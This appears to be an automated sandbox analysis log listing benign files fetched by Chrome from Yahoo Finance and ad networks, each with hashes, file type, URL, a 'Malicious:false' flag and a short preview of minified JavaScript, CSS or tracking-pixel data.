                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E7EA03C9E9B163DACFB436BBF047CD31BD2A0C52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96EBDB3700A8E42EF4BCAE244F90E75F5CE0B47158FE044030709241F4195ACE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B4F1D95CCBE0561ACDB1207D131174A8F53A29DD2AF8A21AD4C74E38BB85773201F0D90982A7504162073B2D7E31EF3C442081E1381C703339A6E37AEC786481
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/pagead/managed/js/activeview/current/ufs_web_display.js?cache=r20110914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},p=ca(this),.u=function(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.sg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.sg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (21224)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.349731623672621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:PLX1wtH+NTv0vDckjUhzU0ZppJeiUGg2TD7eC43YU/Us3ZYNbHG3W5AJdME9oPaV:jKtPQOaG3WFaoPaIK/zn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F1DFC75C82E12DFE846D5593978E422A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:12E580A708B09C9A8F4CA7CCBE9DD7DF32EDEE60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:08204982C484FAF6890C60557A4E642971F17625DDDDC0559DC0E3CA728AC9E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:623412E6D454104251215E38A0F365F879EC70F77306769F5FA40E144C0EAB43237D1FE13B92031AD5848071A6A8910F01576F079E1A0904F4D8DD8959D922A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tpc.googlesyndication.com/safeframe/1-0-40/js/ext.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&aa(c,a,{configurable:!0,writable:!0,value:b})}},ea=function(a){return a.raw=a},fa="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};da("Object.assign",f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (20581)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):20765
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.294839791503179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:mb5vj+l3jfaksTAAvNWUwLATFqACns+CSHDJDLrx:i5vj+5jfSTtrTFqACs+CSHtD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:15065981497259D972918A646AB771E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F2DE8453FCCB34BAF26D784AFA965DBE8C0D1550
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8A1B58D624EEB47E9E3073531A5D364E41A2E7853C052873A79917F97DD0BB44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:38CA7D35BEC8C1E2F3E17EEE4048E724F84B7C44EF001AF83E3CA68281A7E3E77E132283FF3597BFB0069B2B3B5C73BA9C9AFEFB12793EEC2F501D5F13E6D7ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! Hammer.JS - v2.0.8 - 2016-04-23. * http://hammerjs.github.io/. *. * Copyright (c) 2016 Jorik Tangelder;. * Licensed under the MIT license */.!function(a,b,c,d){"use strict";function e(a,b,c){return setTimeout(j(a,c),b)}function f(a,b,c){return Array.isArray(a)?(g(a,c[b],c),!0):!1}function g(a,b,c){var e;if(a)if(a.forEach)a.forEach(b,c);else if(a.length!==d)for(e=0;e<a.length;)b.call(c,a[e],e,a),e++;else for(e in a)a.hasOwnProperty(e)&&b.call(c,a[e],e,a)}function h(b,c,d){var e="DEPRECATED METHOD: "+c+"\n"+d+" AT \n";return function(){var c=new Error("get-stack-trace"),d=c&&c.stack?c.stack.replace(/^[^\(]+?[\n$]/gm,"").replace(/^\s+at\s+/gm,"").replace(/^Object.<anonymous>\s*\(/gm,"{anonymous}()@"):"Unknown Stack Trace",f=a.console&&(a.console.warn||a.console.log);return f&&f.call(a.console,e,d),b.apply(this,arguments)}}function i(a,b,c){var d,e=b.prototype;d=a.prototype=Object.create(e),d.constructor=a,d._super=e,c&&la(d,c)}function j(a,b){return function(){return a.apply(b,argumen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):654
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.3985411335331275
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:6v/7lGSMzlNR1G0Et5h5h5h5vHmbocTz4Mfh9O6f/KkwB/lY0kIyjNEpvaHVoBwX:l/DQNm4OeS7w3zujFHuBwea
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9AC67F24996A6DC3F291AC986647921D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5BBB5DAB3FE91A7EFD2C645C21E4C0E7EB9A0091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:43F77BC6963025A15B474A6591E18E3776A165A5806EF0C0A5444A154159EF54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F723448866B4189FF81C00375728C70E7982B8B00AFCA051D8F8D2190C2A85B9ABF45C5D89AECBAE36142BC801E0CF6A5A1FF53939EB79406841CBF20FA52BA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....UIDATx^.?jWA.F...Zp#.@..r.b.p..vVb..7.......D..4Bd.....f..{3.{..9..?.KHrq...]h%DSB4%DSB4%DSB4%DSB4%DSB4%....mR..l..nR.t<x..^..QU.It....C.p..<x..A.N.|..w...W...\~.#.h.....N...*....N...*....%...*....p<..g.eg!.^.;..6.~...$..;....i.....@.p^.....Z#|.UB....$.........>.*.Q.....8In...^..Jh...')...-.yY%....Jj............:.C..ng..GU.;up......W.s.H{.v..v..Ni......6+....v9..%.sH..%..........&;..pP.w...n'...J..S.'..E..t.vj..w.(....4K.....G......Ii....wSBG..Y.'x.J.,..)....]K.~.0@..+a.{.}.(a....aJ..Vx.P%.t+.n...[...0...........%L........[...I..)!...)!...)!...)!...)!...)!...)!...O.,n.=.H....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/rum?cm_dsp_id=45&external_user_id=CAESELrGnv9wPdIMioBkUGrT1WE&google_cver=1&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2371)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.940514976925178
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:uR7RY4zvNJaR7RhR7RARURYlR7RbR7RwRtRY8RJRYaR7RYeER7RYR7RYdrR7RYgX:H4zvP5TPdUMJHEGy6V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0F20ECC505B3965168E294542D8F5880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:96C60F7C64246006531470D662FCA3E7271CB24E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DAB85771228CFCCB97F50BCF40D8FA5655B08DB90F00D0A9466D0B21A63D0FD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:891C047D9FBE02AF664FE4DB8C4B9FE3BBC9B39671198EC1FADE9FB3EAD2B5361952A04DCD536CA94340B515F3EA890ACEF94E88973FBFA67DC8B57A27362752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Autocomplete.q9sgwYZU.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.finsrch-rslt.yf-cs8l6v.yf-cs8l6v{border-bottom-right-radius:1.25rem;border-bottom-left-radius:1.25rem;box-shadow:0 4px 12px #00000026,0 0 1px #0000001a;background-color:var(--surface2);position:absolute;width:100%;word-break:break-all;white-space:nowrap;left:0;z-index:10;overflow-y:auto}.formContainer.yf-cs8l6v.yf-cs8l6v{width:100%}form.yf-cs8l6v.yf-cs8l6v{position:relative}form.header-srch.yf-cs8l6v .finsrch-rslt.yf-cs8l6v{border-bottom-right-radius:0;border-bottom-left-radius:0}.finsrch-inpt.yf-cs8l6v.yf-cs8l6v{display:inline-block;width:100%;border:0;text-align:left;line-height:1.25;height:2.5rem;padding:var(--space-3);padding-left:var(--space-7);font-size:var(--font-l)}.finsrch-inpt.rounded.yf-cs8l6v.yf-cs8l6v,.finsrch-inpt.yf-cs8l6v .fixed-rounded.yf-cs8l6v{border-radius:var(--border-radius-xl)}.finsrch-inpt.yf-cs8l6v .fixed-squared.yf-cs8l6v{border-radius:var(--border-radius-s)}.finsrch-inpt.bordered.yf-cs8l6v.yf-cs8l6v{border:1px solid var(--light-divider)}.finsrch-inpt.yf-cs8l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3002)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3003
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.497369454782194
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:Kt4jscMWTxkmowjtNyTXUsasXgum5cg+Y1pg5JhLuEM6wEeceJl0GGLeNpqdYNWx:A4jbF264ksasXgl+Y1pgBLuXrv/v/qq0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2065DB08A6309A2370371EAEA8CD5225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EE12A4C012193077903E282171E6074D0AD277BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EA2458BFC0A4494D4C20B65BA01526C2624B365C0D5AA5C98655C9570755AA0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A8F914D228DEEB52915CAA93F109DBCB11052E54F72C3989FD647F3E972A662E386BABBFBDF4A0D6405199C2686E014B41E74C0AA180096B57AFFB52F8F2573C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ErrorMsg.DF_ReW41.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as A,e as F,b as M,t as O,d as H,f as C,j as R,h as V,i as I,q as d,_ as h,U as u,k as j,l as z,m as w}from"./scheduler.Dr9AAxFe.js";import{S as G,i as P,t as y,g as U,a as b,e as v,c as B,b as J,m as K,d as L}from"./index.DCSmZEjO.js";import{E as Q}from"./error_outline.CkdKfkE_.js";import{I as W}from"./Icon.BSWt_jx8.js";import{t as D}from"./commonUtil.CI22_Irn.js";function q(s){let e,i;return e=new W({props:{icon:Q,type:s[6],size:s[8],className:s[13]}}),{c(){B(e.$$.fragment)},l(t){J(e.$$.fragment,t)},m(t,c){K(e,t,c),i=!0},p(t,c){const m={};c&64&&(m.type=t[6]),c&256&&(m.size=t[8]),c&8192&&(m.className=t[13]),e.$set(m)},i(t){i||(y(e.$$.fragment,t),i=!0)},o(t){b(e.$$.fragment,t),i=!1},d(t){L(e,t)}}}function X(s){let e,i,t,c=D(s[3],s[4])+"",m,r,_,o,n=s[5]&&q(s);return{c(){e=F("div"),n&&n.c(),i=M(),t=F("p"),m=O(c),this.h()},l(a){e=H(a,"DIV",{class:!0,role:!0,"data-testid":!0});var f=C(e);n&&n.l(f),i=R(f),t=H(f,"P",{class:!0});var g=C(t);m=V(g,c),g.forEach(I),f.forEach(I),this.h()}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (49215)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):49303
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.332003974067995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:cs5YFNH3tY9Z4nTm0a/l/DYuXyozLdmg1z52eQOAbVAzxl6ytIwAFlt1aAvA8ie6:N4nTmT/D7JiA+1uuMhL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DE1AF2434303255EEC1B0DC77CB2AC5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0D5DAB396BC33D293C22E92CD834BD02F45CE3CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548EB46A28694BF39B08C54D42C56513505F916A32F03BDB411DE124C6552BEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:64C45496AC3692BF0628FA68C8A0D6091372C8CBCFAB3175045260C02B90505E8C02585E650224066B58C98BEED06EC81CCFCFAC3B1E99913F35BAC08A2C1421
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uc/finance/webcore/js/streamer.248f993752a5b05fef83.mjs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! For license information please see streamer.248f993752a5b05fef83.mjs.LICENSE.txt */.(()=>{var e={1386:(e,t,r)=>{"use strict";r.r(t);var s=r(3379),i=r.n(s),n=r(9037),a=r.n(n),o=r(569),c=r.n(o),l=r(3565),u=r.n(l),h=r(9216),b=r.n(h),f=r(2566),d={};d.setAttributes=u(),d.insert=c().bind(null,"head"),d.domAPI=a(),d.insertStyleElement=b(),i()(f.Z,d);const m=f.Z&&f.Z.locals?f.Z.locals:void 0;var p=r(4149),g=r.n(p);function y(){return y=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var s in r)Object.prototype.hasOwnProperty.call(r,s)&&(e[s]=r[s])}return e},y.apply(this,arguments)}const v="streamer",w="txt",S="data-field",k="data-symbol",M="data-stream",P="data-value",T="value",C="active";class E extends HTMLElement{constructor(){var e,t,r,s;super(),e=this,r=({isIntersecting:e})=>{if(this.isIntersecting=e,e&&!this.subscribed){const e=this.getAttribute(S),t=this.getAttribute(k);this.value=parseFloat(this.getAttribute(P)||this.getAttr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (1419)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1421
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.91439650814631
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:PlWb3GlG+JGGJRliLIGexV/rKZX7d7EVLWKZX+jGeU7AjFlWHjV3q1GlOwFcu4YZ:PuGFGmli2V/GNWVHPsjF861GLNVYDnk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F1DB852512F0EEEF6B267FEE3DA23BAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B0306972AC46DF668417BD2EF17CC15442A3FBB9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F1869895BA389A3833881B0CAA4566BF5CEDEB4AD99F320F40DB532705B3DA14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:39C5C10926D796B68214F32E2D8097E30877D75A840584551011F2550B2BBA8C244C2634C9D474B925A58EBDD67420DE63F18ED114AC44AA50B7BFEFA892AA3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Logo.BwBAfWlF.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:@charset "UTF-8";.privacy-container.yf-1aidke3.yf-1aidke3{display:none}.privacy-container.yf-1aidke3>.yf-1aidke3:nth-child(1){margin-top:0}.privacy-icon.yf-1aidke3.yf-1aidke3{max-width:2.188rem}.link-groups.yf-1aidke3.yf-1aidke3{display:flex;justify-content:center;align-items:center;-moz-column-gap:.188rem;column-gap:.188rem;margin:var(--space-1) 0}.column.yf-1aidke3.yf-1aidke3,.row.yf-1aidke3.yf-1aidke3{text-align:left;gap:var(--space-1);align-items:flex-start;margin:var(--space-1) 0}.column.yf-1aidke3.yf-1aidke3{flex-direction:column;justify-content:left}.row.yf-1aidke3.yf-1aidke3{flex-flow:row wrap;justify-content:center;row-gap:var(--space-1)}.terms-and-privacy.medium.yf-1aidke3.yf-1aidke3{font-size:var(--font-m)}.terms-and-privacy.small.yf-1aidke3.yf-1aidke3{font-size:var(--font-s)}@media only screen and (min-width: 768px){.privacy-container.yf-1aidke3.yf-1aidke3{display:block;text-align:center;margin-bottom:var(--space-3)}.privacy-container.yf-1aidke3 .center-dot:before{content:"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10637), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2085652328167145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3rXOcuETuQtQlAQ6g/o5gaDMX5yZ909VeAMg5xmiSvxlAQ60omIcr7Q0QvCjlJlr:3+EiQdgw5TMXoyPMg5xmiwq0Icr78vC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:397B59E3EECA4F747EA1F6FF6323154C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C96E42A81F2F864313F6592688CA864D4578E3C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ACF529F550F2FDAAD913C10E6972344E43E07EAE8D5AA57B96FA30ED7C07ACC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA0F4D6A4FF28A66868BC2387F737073D6CA26A429CBA97CE30B3F86A0820BF0355214618D95CFB5099AF3AF241F50440F3B870BB5C4D26275EFCB93772B8318
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-beacon-1.3.4-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-beacon",[],t):"object"==typeof exports?exports["wafer-beacon"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-beacon"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=yieldmo_dbm&google_hm=VmVtYVJSUnNzVlJPaWZrTndoNTM=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
